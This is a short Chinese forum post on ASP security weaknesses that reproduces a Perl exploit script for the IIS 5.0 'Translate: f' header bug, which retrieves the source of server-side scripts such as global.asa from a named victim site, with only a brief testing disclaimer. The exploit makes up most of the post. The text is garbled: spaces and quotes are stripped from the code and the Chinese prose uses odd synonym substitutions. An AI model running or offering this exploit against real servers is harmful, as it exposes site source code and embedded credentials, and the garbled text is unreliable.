|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
ASP最大的缺点在于网络的安全性和可靠性,企业将经营数据放在开放的平台上,最大的担忧就是如何保证这些数据不被其他人破坏。iis|iisiis5的asp保守
当IIS5.0吸收到一个特别格局的头(Translate:f)的HTTP哀求,同时UR
L开端包括一个特别字符时,IIS会利用毛病的处置办法招致文件源代码泄露。
以下代码仅仅用来测试和研讨这个毛病,假如您将其用于不合法的路子请成果自
负
#!/usr/bin/perl
#Expl0itBysmiler@vxd.org
#TestedwithsucessagainstIIS5.0.MaybeitworksagainstIIS4.0u
singashareddrivebutIhaventtestedityet.
#Getthesourcecodeofanyscriptfromtheserverusingthisexploit
.
#ThiscodewaswrittenafterDanielDocekalbroughtthisissueinBug
Traq.
#Cheers351andFractalG:)
if(not$ARGV[0]){
printqq~
Geeeitsrunning!!kewl:)))
Usage:srcgrab.plExampleUsage:srcgrab.plhttp://www.victimsite.co
m/global.asa
Ucanalsosavetheretrievedfileusing:srcgrab.plhttp://www.victi
m.com/default.asp>file_to_save
~;exit;}
$victimurl=$ARGV[0];
#Createauseragentobject
useLWP::UserAgent;
$ua=newLWP::UserAgent;
#Createarequest
my$req=newHTTP::RequestGET=>$victimurl.;#Hereistheba
ckslashattheendoftheurl;)
$req->content_type(application/x-www-form-urlencoded);
$req->content_type(text/html);
$req->header(Translate=>f);#Hereisthefamoustranslateheader
:))
$req->content(match=www&errors=0);
#Passrequesttotheuseragentandgetaresponseback
my$res=$ua->request($req);
#Checktheoutcomeoftheresponse
if($res->is_success){
print$res->content;
}else{
print$res->error_as_HTML;
}
</p>缺点:正版成本价格贵(盗版就不说了)、不够安全,大多数服务器用windows系统,没有linux安全 |
|